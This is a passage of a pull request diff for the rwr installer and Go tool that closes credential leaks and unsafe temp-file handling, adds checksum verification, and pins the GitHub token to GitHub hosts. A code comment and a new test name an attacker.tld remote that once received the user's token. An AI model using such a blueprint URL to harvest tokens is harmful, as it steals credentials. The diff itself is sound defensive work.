### PR TITLE
fix(security): close command injection, path traversal, and credential leaks

### DIFF
--- a/install.sh
+++ b/install.sh
@@ -1,73 +1,175 @@
-#!/bin/bash
+#!/usr/bin/env bash
+set -euo pipefail
 
+REPO="FynxLabs/rwr"
 BINARY_PATH="/usr/local/bin"
 LICENSE_PATH="/usr/local/share/doc/rwr"
 README_PATH="/usr/local/share/doc/rwr"
 
-REPO="FynxLabs/rwr"
+USER_AGENT="rwr-installer"
+
+fail() {
+    echo "$@" >&2
+    exit 1
+}
 
 OS=$(uname -s)
 case "$OS" in
     Linux*)     OS="Linux";;
     Darwin*)    OS="Darwin";;
-    *)          echo "Unsupported operating system: $OS"; exit 1;;
+    *)          fail "Unsupported operating system: $OS. RWR publishes Linux and Darwin builds; use install.ps1 on Windows.";;
 esac
 
+# These names have to match what goreleaser publishes (see .goreleaser.yaml):
+# amd64 -> x86_64, arm+goarm=7 -> armv7, arm64 and riscv64 keep their names.
+# There is deliberately no i386 entry: no 386 target is built, so accepting it
+# only produced a misleading "could not find a download URL" later on.
 ARCH=$(uname -m)
 case "$ARCH" in
-    x86_64*)    ARCH="x86_64";;
-    i386*)      ARCH="i386";;
-    arm64*)     ARCH="arm64";;
-    armv7*)     ARCH="armv7";;
-    aarch64*)   ARCH="arm64";;
-    riscv64*)   ARCH="riscv64";;
-    *)          echo "Unsupported architecture: $ARCH"; exit 1;;
+    x86_64|amd64)       ARCH="x86_64";;
+    arm64|aarch64)      ARCH="arm64";;
+    armv7*|armv8l)      ARCH="armv7";;
+    riscv64)            ARCH="riscv64";;
+    *)                  fail "Unsupported architecture: $ARCH. RWR publishes x86_64, arm64, armv7 (Linux only) and riscv64 (Linux only) builds.";;
 esac
 
-latest_release=$(curl --silent "https://api.github.com/repos/$REPO/releases/latest")
+# riscv64 and armv7 are only built for Linux.
+if [ "$OS" = "Darwin" ] && { [ "$ARCH" = "riscv64" ] || [ "$ARCH" = "armv7" ]; }; then
+    fail "Unsupported platform: $OS $ARCH. RWR publishes Darwin builds for x86_64 and arm64 only."
+fi
 
-download_url=$(echo "$latest_release" | sed -n 's/.*"browser_download_url": "\([^"]*rwr_'"${OS}"'_'"${ARCH}"'\.tar\.gz\)".*/\1/p' | head -1)
+ASSET="rwr_${OS}_${ARCH}.tar.gz"
+CHECKSUMS="checksums.txt"
 
+# Work out how to write to the install locations before downloading anything, so
+# a missing sudo is reported up front rather than half way through an install.
+first_existing_dir() {
+    local dir="$1"
+    while [ ! -d "$dir" ] && [ "$dir" != "/" ]; do
+        dir=$(dirname "$dir")
+    done
+    printf '%s' "$dir"
+}
+
+SUDO=""
+as_root() {
+    if [ -n "$SUDO" ]; then
+        sudo "$@"
+    else
+        "$@"
+    fi
+}
+
+if [ "$(id -u)" -ne 0 ]; then
+    for target in "$BINARY_PATH" "$LICENSE_PATH" "$README_PATH"; do
+        if [ ! -w "$(first_existing_dir "$target")" ]; then
+            SUDO="sudo"
+            break
+        fi
+    done
+    if [ -n "$SUDO" ] && ! command -v sudo >/dev/null 2>&1; then
+        fail "Installing to $BINARY_PATH needs root, but sudo is not available. Re-run this script as root, or set a writable install prefix."
+    fi
+fi
+
+# A private per-run directory: fixed /tmp paths can be pre-created by any local
+# user as a symlink, and everything below either downloads into this directory
+# or copies out of it with root privileges.
+TMP_DIR=$(mktemp -d "${TMPDIR:-/tmp}/rwr-install.XXXXXXXXXX")
+cleanup() {
+    rm -rf "$TMP_DIR"
+}
+trap cleanup EXIT
+
+echo "Installing RWR for $OS $ARCH"
+
+if ! latest_release=$(curl -fsSL -H "User-Agent: $USER_AGENT" "https://api.github.com/repos/$REPO/releases/latest"); then
+    fail "Failed to query the latest release from the GitHub API. The API may be unreachable or rate limiting this host (unauthenticated requests are limited per IP). Try again later."
+fi
+
+asset_urls=$(printf '%s' "$latest_release" |
+    grep -o '"browser_download_url"[[:space:]]*:[[:space:]]*"[^"]*"' |
+    sed 's/.*"\(https[^"]*\)"$/\1/' || true)
+
+if [ -z "$asset_urls" ]; then
+    fail "The GitHub API response contained no release assets. The release may still be publishing, or the response was not what was expected."
+fi
+
+# Match the whole file name, not a substring, so rwr_Linux_arm64.tar.gz can
+# never satisfy a request for rwr_Linux_arm.tar.gz.
+url_for_asset() {
+    printf '%s\n' "$asset_urls" |
+        awk -v n="$1" 'substr($0, length($0) - length(n)) == "/" n { print; exit }'
+}
+
+download_url=$(url_for_asset "$ASSET")
 if [ -z "$download_url" ]; then
-    echo "Could not find a download URL for $OS $ARCH. Exiting."
-    exit 1
+    fail "The latest release does not contain $ASSET, so there is no build for $OS $ARCH. Exiting."
 fi
 
-echo "Downloading RWR from $download_url"
-if ! curl -L -o /tmp/rwr.tar.gz "$download_url"; then
-    echo "Failed to download RWR. Exiting."
-    exit 1
+checksums_url=$(url_for_asset "$CHECKSUMS")
+if [ -z "$checksums_url" ]; then
+    fail "The latest release does not publish $CHECKSUMS, so the download cannot be verified. Exiting."
 fi
 
-mkdir -p /tmp/rwr_extracted
-if ! tar -xzf /tmp/rwr.tar.gz -C /tmp/rwr_extracted; then
-    echo "Failed to extract RWR archive. Exiting."
-    rm -f /tmp/rwr.tar.gz
-    exit 1
+echo "Downloading $ASSET"
+if ! curl -fsSL -H "User-Agent: $USER_AGENT" -o "$TMP_DIR/$ASSET" "$download_url"; then
+    fail "Failed to download $ASSET from $download_url. Exiting."
 fi
 
-if [ ! -f /tmp/rwr_extracted/rwr ]; then
-    echo "Binary 'rwr' not found in downloaded archive. Exiting."
-    rm -rf /tmp/rwr.tar.gz /tmp/rwr_extracted
-    exit 1
+if ! curl -fsSL -H "User-Agent: $USER_AGENT" -o "$TMP_DIR/$CHECKSUMS" "$checksums_url"; then
+    fail "Failed to download $CHECKSUMS from $checksums_url. Exiting."
 fi
 
-sudo mv /tmp/rwr_extracted/rwr "$BINARY_PATH"
-
-# Ensure the binary is executable
-sudo chmod +x "$BINARY_PATH/rwr"
-
-sudo mkdir -p "$LICENSE_PATH"
-sudo mkdir -p "$README_PATH"
-if [ -f /tmp/rwr_extracted/LICENSE ]; then
-    sudo mv /tmp/rwr_extracted/LICENSE "$LICENSE_PATH"
-fi
-if [ -f /tmp/rwr_extracted/README.adoc ]; then
-    sudo mv /tmp/rwr_extracted/README.adoc "$README_PATH"
-elif [ -f /tmp/rwr_extracted/README ]; then
-    sudo mv /tmp/rwr_extracted/README "$README_PATH"
+# goreleaser writes "<sha256>  <file name>" lines. Compare $2 exactly so a
+# prefix of another asset name cannot be picked up by mistake.
+expected=$(awk -v n="$ASSET" '{ name = $2; sub(/^\*/, "", name); if (name == n) { print $1; exit } }' "$TMP_DIR/$CHECKSUMS")
+if [ -z "$expected" ]; then
+    fail "$CHECKSUMS has no entry for $ASSET, so the download cannot be verified. Refusing to install."
 fi
 
-rm -rf /tmp/rwr.tar.gz /tmp/rwr_extracted
+if command -v sha256sum >/dev/null 2>&1; then
+    SHA_CHECK=(sha256sum -c -)
+elif command -v shasum >/dev/null 2>&1; then
+    SHA_CHECK=(shasum -a 256 -c -)
+else
+    fail "Neither sha256sum nor shasum is available, so the download cannot be verified. Refusing to install."
+fi
 
-echo "rwr has been installed successfully for $OS $ARCH."
+if ! (cd "$TMP_DIR" && printf '%s  %s\n' "$expected" "$ASSET" | "${SHA_CHECK[@]}" >/dev/null 2>&1); then
+    if command -v sha256sum >/dev/null 2>&1; then
+        actual=$(sha256sum "$TMP_DIR/$ASSET" | awk '{print $1}')
+    else
+        actual=$(shasum -a 256 "$TMP_DIR/$ASSET" | awk '{print $1}')
+    fi
+    echo "Checksum mismatch for $ASSET:" >&2
+    echo "  expected $expected" >&2
+    echo "  actual   $actual" >&2
+    fail "Refusing to install."
+fi
+echo "Checksum verified"
+
+EXTRACT_DIR="$TMP_DIR/extracted"
+mkdir -p "$EXTRACT_DIR"
+if ! tar -xzf "$TMP_DIR/$ASSET" -C "$EXTRACT_DIR"; then
+    fail "Failed to extract $ASSET. Exiting."
+fi
+
+if [ ! -f "$EXTRACT_DIR/rwr" ]; then
+    fail "Binary 'rwr' not found in the downloaded archive. Exiting."
+fi
+
+as_root mkdir -p "$BINARY_PATH" "$LICENSE_PATH" "$README_PATH"
+as_root install -m 0755 "$EXTRACT_DIR/rwr" "$BINARY_PATH/rwr"
+
+if [ -f "$EXTRACT_DIR/LICENSE" ]; then
+    as_root install -m 0644 "$EXTRACT_DIR/LICENSE" "$LICENSE_PATH/LICENSE"
+fi
+for doc in README.adoc README.md README; do
+    if [ -f "$EXTRACT_DIR/$doc" ]; then
+        as_root install -m 0644 "$EXTRACT_DIR/$doc" "$README_PATH/$doc"
+        break
+    fi
+done
+
+echo "rwr has been installed to $BINARY_PATH for $OS $ARCH."

--- a/internal/helpers/configCreator.go
+++ b/internal/helpers/configCreator.go
@@ -7,6 +7,7 @@ import (
 	"path/filepath"
 	"strings"
 
+	"github.com/fynxlabs/rwr/internal/types"
 	"github.com/spf13/viper"
 )
 
@@ -35,8 +36,12 @@ func CreateDefaultConfig() error {
 	configFilePath := filepath.Join(configDir, "config.yaml")
 	viper.SetConfigFile(configFilePath)
 
-	// Prompt for GitHub API Token
-	fmt.Printf("Enter GitHub API Token (press enter to keep default) [%s]: ", viper.GetString("repository.gh_api_token"))
+	// Prompt for GitHub API Token.
+	//
+	// The stored value is redacted rather than shown as the default: this prompt
+	// used to print the live PAT and the Base64 private key to the terminal, where
+	// they stayed in scrollback and in any recorded session.
+	fmt.Printf("Enter GitHub API Token (press enter to keep current) [%s]: ", types.Redact(viper.GetString("repository.gh_api_token")))
 	ghApiTokenInput, _ := reader.ReadString('\n') //nolint:errcheck
 	ghApiTokenInput = strings.TrimSpace(ghApiTokenInput)
 	if ghApiTokenInput != "" {
@@ -44,7 +49,7 @@ func CreateDefaultConfig() error {
 	}
 
 	// Prompt for SSH Private Key
-	fmt.Printf("Enter SSH Private Key (file path or Base64 encoded) (press enter to keep default) [%s]: ", viper.GetString("repository.ssh_private_key"))
+	fmt.Printf("Enter SSH Private Key (file path or Base64 encoded) (press enter to keep current) [%s]: ", types.Redact(viper.GetString("repository.ssh_private_key")))
 	sshPrivateKeyInput, _ := reader.ReadString('\n') //nolint:errcheck
 	sshPrivateKeyInput = strings.TrimSpace(sshPrivateKeyInput)
 	if sshPrivateKeyInput != "" {
@@ -71,30 +76,6 @@ func CreateDefaultConfig() error {
 		viper.Set("log.level", logLevelInput)
 	} else {
 		viper.Set("log.level", defaultLogLevel) // Set to default if no input is provided
-	}
-
-	// Prompt for Default Package Manager on Linux
-	fmt.Printf("Set the default package manager for Linux (press enter to keep default) [%s]: ", viper.GetString("packageManager.linux.default"))
-	linuxDefaultPMInput, _ := reader.ReadString('\n') //nolint:errcheck
-	linuxDefaultPMInput = strings.TrimSpace(linuxDefaultPMInput)
-	if linuxDefaultPMInput != "" {
-		viper.Set("packageManager.linux.default", linuxDefaultPMInput)
-	}
-
-	// Prompt for Default Package Manager on macOS
-	fmt.Printf("Set the default package manager for macOS (press enter to keep default) [%s]: ", viper.GetString("packageManager.macos.default"))
-	macOSDefaultPMInput, _ := reader.ReadString('\n') //nolint:errcheck
-	macOSDefaultPMInput = strings.TrimSpace(macOSDefaultPMInput)
-	if macOSDefaultPMInput != "" {
-		viper.Set("packageManager.macos.default", macOSDefaultPMInput)
-	}
-
-	// Prompt for Default Package Manager on Windows
-	fmt.Printf("Set the default package manager for Windows (press enter to keep default) [%s]: ", viper.GetString("packageManager.windows.default"))
-	windowsDefaultPMInput, _ := reader.ReadString('\n') //nolint:errcheck
-	windowsDefaultPMInput = strings.TrimSpace(windowsDefaultPMInput)
-	if windowsDefaultPMInput != "" {
-		viper.Set("packageManager.windows.default", windowsDefaultPMInput)
 	}
 
 	// Prompt for Repository Configuration

--- a/internal/helpers/git.go
+++ b/internal/helpers/git.go
@@ -3,6 +3,7 @@ package helpers
 import (
 	"errors"
 	"fmt"
+	neturl "net/url"
 	"os"
 	"path/filepath"
 	"strings"
@@ -16,16 +17,6 @@ import (
 	"github.com/go-git/go-git/v5/plumbing/transport/ssh"
 )
 
-// HandleGitOperation routes a Git operation to either clone or file download
-// based on whether the URL has a file extension.
-func HandleGitOperation(opts types.GitOptions, initConfig *types.InitConfig) error {
-	if filepath.Ext(opts.URL) != "" {
-		return HandleGitFileDownload(opts, initConfig)
-	} else {
-		return HandleGitClone(opts, initConfig)
-	}
-}
-
 // HandleGitClone clones a Git repository to the specified path with optional
 // authentication via SSH key, GitHub API token, or OAuth.
 func HandleGitClone(opts types.GitOptions, initConfig *types.InitConfig) error {
@@ -35,7 +26,11 @@ func HandleGitClone(opts types.GitOptions, initConfig *types.InitConfig) error {
 
 	// Use authentication for private repos or SSH URLs
 	if opts.Private || strings.HasPrefix(opts.URL, "git@") {
-		auth = getAuthMethod(opts.URL, initConfig)
+		var err error
+		auth, err = getAuthMethod(opts.URL, initConfig)
+		if err != nil {
+			return fmt.Errorf("error authenticating Git clone: %w", err)
+		}
 		log.Debugf("Using authentication for Git clone: %s", opts.URL)
 	} else {
 		log.Debugf("No authentication needed for Git clone: %s", opts.URL)
@@ -103,83 +98,125 @@ func CheckAndUpdateRemoteURL(repoPath, desiredURL string) error {
 	return nil
 }
 
-func getAuthMethod(url string, initConfig *types.InitConfig) transport.AuthMethod {
-	if strings.HasPrefix(url, "git@") {
-		// Use the specified SSH key or try to find a suitable key
-		sshKeyValue := initConfig.Variables.Flags.SSHKey
+// githubHosts are the hosts the configured GitHub token may be sent to.
+var githubHosts = map[string]bool{
+	"github.com":     true,
+	"www.github.com": true,
+	// Cloning a file from a repository goes through the raw content host.
+	"raw.githubusercontent.com": true,
+}
 
-		// Check if the value is a Base64-encoded key or a file path
-		if sshKeyValue != "" {
-			// If the value contains newlines or begins with "ssh-", it's likely a Base64-encoded key
-			if strings.Contains(sshKeyValue, "\n") || strings.HasPrefix(sshKeyValue, "ssh-") {
-				log.Debugf("Using Base64-encoded SSH key")
-				auth, err := ssh.NewPublicKeys("git", []byte(sshKeyValue), "")
-				if err != nil {
-					log.Errorf("Error creating SSH authentication from Base64 key: %v", err)
-					return nil
-				}
-				return auth
-			} else {
-				// Treat as a file path
-				if _, err := os.Stat(sshKeyValue); os.IsNotExist(err) {
-					log.Errorf("Specified SSH key file does not exist: %s", sshKeyValue)
-					return nil
-				}
+// getAuthMethod picks the credential for a remote, and returns an error rather
+// than a credential when honouring the request would leak one.
+//
+// The URL comes from a blueprint, so it is attacker-controlled input whenever a
+// blueprint is: this used to attach the user's GitHub token to every non-SSH
+// remote, which meant `{url: "http://attacker.tld/r.git", private: true}` mailed
+// the PAT to the attacker in cleartext. The token now goes to GitHub's hosts and
+// nowhere else, and http:// is refused for private repos outright — there is no
+// safe way to send a credential over it.
+func getAuthMethod(rawURL string, initConfig *types.InitConfig) (transport.AuthMethod, error) {
+	if !strings.HasPrefix(rawURL, "git@") {
+		return getHTTPAuthMethod(rawURL, initConfig)
+	}
+	return getSSHAuthMethod(initConfig)
+}
 
-				auth, err := ssh.NewPublicKeysFromFile("git", sshKeyValue, "")
-				if err != nil {
-					log.Errorf("Error creating SSH authentication from file: %v", err)
-					return nil
-				}
-				return auth
-			}
-		} else {
-			// No SSH key specified, try to find a suitable key file
-			homeDir, err := os.UserHomeDir()
+// getHTTPAuthMethod returns the token for GitHub remotes and no credential for
+// every other host, so a non-GitHub remote is cloned anonymously rather than
+// handed a secret it has no claim to.
+func getHTTPAuthMethod(rawURL string, initConfig *types.InitConfig) (transport.AuthMethod, error) {
+	parsed, err := neturl.Parse(rawURL)
+	if err != nil {
+		return nil, fmt.Errorf("invalid repository URL %q: %w", rawURL, err)
+	}
+
+	if parsed.Scheme == "http" {
+		return nil, fmt.Errorf("refusing to use %q: http:// sends the repository credential in cleartext, use https:// instead", rawURL)
+	}
+	if parsed.Scheme != "https" {
+		return nil, fmt.Errorf("refusing to use %q: only https:// and git@ remotes support authentication", rawURL)
+	}
+
+	if !githubHosts[strings.ToLower(parsed.Hostname())] {
+		log.Warnf("Not sending the GitHub token to %s: it is not a GitHub host; cloning without authentication", parsed.Hostname())
+		return nil, nil
+	}
+
+	token := initConfig.Variables.Flags.GHAPIToken
+	if token == "" {
+		log.Debugf("No GitHub token configured; cloning %s without authentication", rawURL)
+		return nil, nil
+	}
+
+	return &http.BasicAuth{
+		Username: "git",
+		Password: token,
+	}, nil
+}
+
+func getSSHAuthMethod(initConfig *types.InitConfig) (transport.AuthMethod, error) {
+	// Use the specified SSH key or try to find a suitable key
+	sshKeyValue := initConfig.Variables.Flags.SSHKey
+
+	// Check if the value is a Base64-encoded key or a file path
+	if sshKeyValue != "" {
+		// If the value contains newlines or begins with "ssh-", it's likely a Base64-encoded key
+		if strings.Contains(sshKeyValue, "\n") || strings.HasPrefix(sshKeyValue, "ssh-") {
+			log.Debugf("Using Base64-encoded SSH key")
+			auth, err := ssh.NewPublicKeys("git", []byte(sshKeyValue), "")
 			if err != nil {
-				log.Errorf("Error getting user home directory: %v", err)
-				return nil
+				return nil, fmt.Errorf("error creating SSH authentication from Base64 key: %w", err)
 			}
-
-			// List of common SSH key locations to try
-			possibleKeys := []string{
-				filepath.Join(homeDir, ".ssh", "id_rsa"),
-				filepath.Join(homeDir, ".ssh", "git"),
-				filepath.Join(homeDir, ".ssh", "id_ed25519"),
-				filepath.Join(homeDir, ".ssh", "github_rsa"),
-				filepath.Join(homeDir, ".ssh", "id_ecdsa"),
-			}
-
-			// Try each possible key location
-			keyFound := false
-			sshKeyPath := ""
-			for _, keyPath := range possibleKeys {
-				if _, err := os.Stat(keyPath); err == nil {
-					sshKeyPath = keyPath
-					keyFound = true
-					log.Debugf("Found SSH key at: %s", sshKeyPath)
-					break
-				}
-			}
-
-			if !keyFound {
-				log.Errorf("No SSH key found in common locations. Please specify an SSH key path or Base64-encoded key.")
-				return nil
-			}
-
-			auth, err := ssh.NewPublicKeysFromFile("git", sshKeyPath, "")
-			if err != nil {
-				log.Errorf("Error creating SSH authentication: %v", err)
-				return nil
-			}
-			return auth
+			return auth, nil
 		}
-	} else {
-		return &http.BasicAuth{
-			Username: "git",
-			Password: initConfig.Variables.Flags.GHAPIToken,
+
+		// Treat as a file path
+		if _, err := os.Stat(sshKeyValue); os.IsNotExist(err) {
+			return nil, fmt.Errorf("specified SSH key file does not exist: %s", sshKeyValue)
+		}
+
+		auth, err := ssh.NewPublicKeysFromFile("git", sshKeyValue, "")
+		if err != nil {
+			return nil, fmt.Errorf("error creating SSH authentication from file: %w", err)
+		}
+		return auth, nil
+	}
+
+	// No SSH key specified, try to find a suitable key file
+	homeDir, err := os.UserHomeDir()
+	if err != nil {
+		return nil, fmt.Errorf("error getting user home directory: %w", err)
+	}
+
+	// List of common SSH key locations to try
+	possibleKeys := []string{
+		filepath.Join(homeDir, ".ssh", "id_rsa"),
+		filepath.Join(homeDir, ".ssh", "git"),
+		filepath.Join(homeDir, ".ssh", "id_ed25519"),
+		filepath.Join(homeDir, ".ssh", "github_rsa"),
+		filepath.Join(homeDir, ".ssh", "id_ecdsa"),
+	}
+
+	// Try each possible key location
+	sshKeyPath := ""
+	for _, keyPath := range possibleKeys {
+		if _, err := os.Stat(keyPath); err == nil {
+			sshKeyPath = keyPath
+			log.Debugf("Found SSH key at: %s", sshKeyPath)
+			break
 		}
 	}
+
+	if sshKeyPath == "" {
+		return nil, fmt.Errorf("no SSH key found in common locations: specify an SSH key path or Base64-encoded key")
+	}
+
+	auth, err := ssh.NewPublicKeysFromFile("git", sshKeyPath, "")
+	if err != nil {
+		return nil, fmt.Errorf("error creating SSH authentication: %w", err)
+	}
+	return auth, nil
 }
 
 // HandleGitPull pulls the latest changes from a remote Git repository,
@@ -210,7 +247,10 @@ func HandleGitPull(opts types.GitOptions, initConfig *types.InitConfig) error {
 		remoteURL := remote.Config().URLs[0]
 		// For SSH URLs (git@...) or if the repo is marked as private, use authentication
 		if strings.HasPrefix(remoteURL, "git@") || opts.Private {
-			auth = getAuthMethod(remoteURL, initConfig)
+			auth, err = getAuthMethod(remoteURL, initConfig)
+			if err != nil {
+				return fmt.Errorf("error authenticating Git pull: %w", err)
+			}
 			log.Debugf("Using authentication for Git pull: %s", opts.Target)
 		} else {
 			log.Debugf("No authentication needed for Git pull: %s", opts.Target)
@@ -226,63 +266,5 @@ func HandleGitPull(opts types.GitOptions, initConfig *types.InitConfig) error {
 	}
 
 	log.Infof("Git repository updated: %s", opts.Target)
-	return nil
-}
-
-// HandleGitFileDownload downloads a single file from a GitHub repository
-// by converting the blob URL to a raw content URL.
-func HandleGitFileDownload(opts types.GitOptions, initConfig *types.InitConfig) error {
-	log.Debugf("Downloading file from Git repository: %s", opts.URL)
-	// Extract the repository URL and file path from the opts.URL
-	parts := strings.Split(opts.URL, "/blob/")
-	if len(parts) != 2 {
-		return fmt.Errorf("invalid URL format for file download")
-	}
-	repoURL := parts[0]
-	filePath := parts[1]
-
-	// Create a temporary directory for cloning the repository
-	tempDir, err := os.MkdirTemp("", "git-clone-")
-	if err != nil {
-		return fmt.Errorf("error creating temporary directory: %v", err)
-	}
-	defer func(path string) {
-		err := os.RemoveAll(path)
-		if err != nil {
-			log.Errorf("error removing temporary directory: %v", err)
-		}
-	}(tempDir)
-
-	// Clone the repository into the temporary directory
-	cloneOpts := types.GitOptions{
-		URL:     repoURL,
-		Private: opts.Private,
-		Target:  tempDir,
-	}
-	err = HandleGitClone(cloneOpts, initConfig)
-	if err != nil {
-		return fmt.Errorf("error cloning Git repository: %v", err)
-	}
-
-	// Read the contents of the specified file
-	fileContent, err := os.ReadFile(filepath.Join(tempDir, filePath)) // #nosec G304 -- path is operator-supplied blueprint/config input; containment added in PR8
-	if err != nil {
-		return fmt.Errorf("error reading file from Git repository: %v", err)
-	}
-
-	// Create the target directory if it doesn't exist
-	targetDir := filepath.Dir(opts.Target)
-	err = os.MkdirAll(targetDir, os.ModePerm) // #nosec G301 -- TODO(PR8): blueprint-target directory; create with the requested mode
-	if err != nil {
-		return fmt.Errorf("error creating target directory: %v", err)
-	}
-
-	// Write the file contents to the target file
-	err = os.WriteFile(opts.Target, fileContent, 0644) // #nosec G306 G703 -- TODO(PR8): create with target mode instead of chmod-after; TODO(PR8): path derived from operator blueprint input; containment added in PR8
-	if err != nil {
-		return fmt.Errorf("error writing file: %v", err)
-	}
-
-	log.Infof("File downloaded from Git repository: %s", opts.Target)
 	return nil
 }

--- a/internal/helpers/git_auth_test.go
+++ b/internal/helpers/git_auth_test.go
@@ -1,0 +1,71 @@
+package helpers
+
+import (
+	"strings"
+	"testing"
+
+	"github.com/fynxlabs/rwr/internal/types"
+	"github.com/go-git/go-git/v5/plumbing/transport/http"
+)
+
+const testGHToken = "ghp_testtoken"
+
+func testInitConfig() *types.InitConfig {
+	return &types.InitConfig{
+		Variables: types.Variables{
+			Flags: types.Flags{GHAPIToken: testGHToken},
+		},
+	}
+}
+
+// TestGetAuthMethodTokenScope pins the token to GitHub. repo.URL comes from a
+// blueprint, so any host it names would otherwise be handed the user's PAT.
+func TestGetAuthMethodTokenScope(t *testing.T) {
+	tests := []struct {
+		name       string
+		url        string
+		wantToken  bool
+		wantErr    bool
+		errFragmnt string
+	}{
+		{name: "github attaches token", url: "https://github.com/fynxlabs/rwr.git", wantToken: true},
+		{name: "github raw host attaches token", url: "https://raw.githubusercontent.com/fynxlabs/rwr/main/f", wantToken: true},
+		{name: "other https host gets no token", url: "https://attacker.tld/r.git"},
+		{name: "http is refused", url: "http://attacker.tld/r.git", wantErr: true, errFragmnt: "cleartext"},
+		{name: "http github is refused too", url: "http://github.com/fynxlabs/rwr.git", wantErr: true, errFragmnt: "cleartext"},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			auth, err := getAuthMethod(tt.url, testInitConfig())
+
+			if tt.wantErr {
+				if err == nil {
+					t.Fatalf("expected an error for %s, got auth %v", tt.url, auth)
+				}
+				if !strings.Contains(err.Error(), tt.errFragmnt) {
+					t.Errorf("error %q does not mention %q", err, tt.errFragmnt)
+				}
+				if auth != nil {
+					t.Errorf("credential returned alongside an error: %v", auth)
+				}
+				return
+			}
+
+			if err != nil {
+				t.Fatalf("unexpected error for %s: %v", tt.url, err)
+			}
+
+			basic, isBasic := auth.(*http.BasicAuth)
+			if !tt.wantToken {
+				if auth != nil {
+					t.Fatalf("token sent to %s: %v", tt.url, auth)
+				}
+				return
+			}
+			if !isBasic || basic.Password != testGHToken {
+				t.Fatalf("expected the GitHub token for %s, got %v", tt.url, auth)
+			}
+		})
+	}
+}

--- a/internal/processors/all.go
+++ b/internal/processors/all.go
@@ -16,12 +16,26 @@ import (
 	"github.com/fynxlabs/rwr/internal/types"
 )
 
+// findBootstrapFile returns the bootstrap blueprint in dir, in whichever format it
+// is written, or "" when the tree has none.
+func findBootstrapFile(dir string) string {
+	for _, ext := range []string{types.FormatExtYAML, types.FormatExtYAMLAlt, types.FormatExtJSON, types.FormatExtTOML} {
+		candidate := filepath.Join(dir, "bootstrap"+ext)
+		if system.FileExists(candidate) {
+			return candidate
+		}
+	}
+	return ""
+}
+
 // All orchestrates the execution of all blueprint processors in the defined run order.
 // It handles bootstrap, package installation, file management, services, and other
 // operations sequentially, cleaning up package manager caches on completion.
 func All(initConfig *types.InitConfig, osInfo *types.OSInfo, runOrder []string) error {
 	var err error
 	var blueprintRunOrder []string
+
+	resetFailures()
 
 	log.Debugf("ForceBootstrap: %v", initConfig.Variables.Flags.ForceBootstrap)
 
@@ -94,15 +108,23 @@ func All(initConfig *types.InitConfig, osInfo *types.OSInfo, runOrder []string) 
 		}
 	}
 
+	if err := checkRequestedProfiles(initConfig); err != nil {
+		return err
+	}
+
 	// Get the blueprint file order
 	fileOrder, err := GetBlueprintFileOrder(initConfig.Init.Location, initConfig.Init.Order, initConfig.Init.RunOnlyListed, initConfig)
 	if err != nil {
 		return fmt.Errorf("error getting blueprint file order: %w", err)
 	}
 
-	// Run the bootstrap processor first if it exists
-	bootstrapFile := filepath.Join(initConfig.Init.Location, "bootstrap.yaml")
-	if system.FileExists(bootstrapFile) {
+	// Run the bootstrap processor first if it exists.
+	//
+	// Every extension is checked, not just .yaml: a tree written in TOML or JSON
+	// declares its format in the init file, and `rwr validate` already accepts all
+	// four. Looking only for bootstrap.yaml meant those trees silently never
+	// bootstrapped, with no message saying so.
+	if bootstrapFile := findBootstrapFile(initConfig.Init.Location); bootstrapFile != "" {
 		err = ProcessBootstrap(bootstrapFile, initConfig, osInfo)
 		if err != nil {
 			return fmt.Errorf("error processing bootstrap: %w", err)
@@ -200,6 +222,49 @@ func All(initConfig *types.InitConfig, osInfo *types.OSInfo, runOrder []string) 
 		log.Infof("No changes were made to the system.")
 	}
 
+	// Processors that skip a failed item and continue record it rather than
+	// aborting. Reporting completion without consulting that ledger is how a run
+	// where every package failed still exited 0.
+	if err := failureError(); err != nil {
+		log.Errorf("RWR run finished with %d failure(s)", failureCount())
+		return err
+	}
+
 	log.Info("RWR Run Complete!")
 	return nil
+}
+
+// checkRequestedProfiles refuses a --profile the tree does not declare.
+//
+// A misspelled profile name was silent: FilterByProfiles matched nothing, every
+// profile-scoped entry was skipped, and the run reported success having installed
+// only the base items. A mistyped profile looked exactly like a working run.
+func checkRequestedProfiles(initConfig *types.InitConfig) error {
+	requested := initConfig.Variables.Flags.Profiles
+	if len(requested) == 0 {
+		return nil
+	}
+
+	summary, err := CollectProfiles(initConfig)
+	if err != nil {
+		// Discovery is a convenience, not a gate: if the tree cannot be walked the
+		// processors below will report why, with better context than this can.
+		log.Debugf("Could not collect profiles to validate --profile: %v", err)
+		return nil
+	}
+
+	invalid := helpers.ValidateProfiles(requested, summary.Names)
+	if len(invalid) == 0 {
+		return nil
+	}
+
+	// Only a tree that declares profiles gives a trustworthy set to check against.
+	// When it declares none, the discovery walk is as likely to be the thing at
+	// fault as the operator, so say so rather than refusing to run.
+	if len(summary.Names) == 0 {
+		log.Warnf("--profile %v was given, but no blueprint in this tree declares any profiles; every profile-scoped entry will be skipped", invalid)
+		return nil
+	}
+
+	return fmt.Errorf("no profile named %v exists in this blueprint tree; available profiles: %v", invalid, summary.Names)
 }

--- a/internal/processors/configuration.go
+++ b/internal/processors/configuration.go
@@ -1,10 +1,13 @@
 package processors
 
 import (
+	"errors"
 	"fmt"
+	"math"
 	"os"
 	"os/exec"
 	"path/filepath"
+	"strconv"
 	"strings"
 
 	"charm.land/log/v2"
@@ -24,11 +27,21 @@ func ProcessConfiguration(blueprintData []byte, blueprintDir string, format stri
 		return fmt.Errorf("error unmarshaling configuration blueprint: %w", err)
 	}
 
-	for _, config := range configData.Configurations {
+	configurations := helpers.FilterByProfiles(configData.Configurations, initConfig.Variables.Flags.Profiles)
+
+	for _, config := range configurations {
 		if system.IsDryRun() {
 			log.Infof("[DRY-RUN] Would apply %s configuration: %s", config.Tool, config.Name)
 			continue
 		}
+		// `set` is the only action any of these tools implement. The field was
+		// decoded and never read, so `action: banana` applied the setting anyway.
+		if config.Action != "" && config.Action != types.ConfigurationActionSet {
+			recordFailure("configuration", config.Name,
+				fmt.Errorf("unsupported action %q: the only supported action is %q", config.Action, types.ConfigurationActionSet))
+			continue
+		}
+
 		var err error
 		switch config.Tool {
 		case "dconf":
@@ -104,12 +117,13 @@ func processGSettings(config types.Configuration) error {
 		checkCmd := exec.Command("gsettings", "writable", config.Schema, key) // #nosec G204 -- argv, not a shell string: schema/key/value are passed as discrete arguments
 		output, err := checkCmd.CombinedOutput()
 		if err != nil {
-			log.Warnf("Error checking if key is writable - Schema: %s, Key: %s, Error: %v, Output: %s", config.Schema, key, err, string(output))
+			recordFailure("configuration", config.Schema+"."+key,
+				fmt.Errorf("checking whether the key is writable: %v (%s)", err, strings.TrimSpace(string(output))))
 			continue
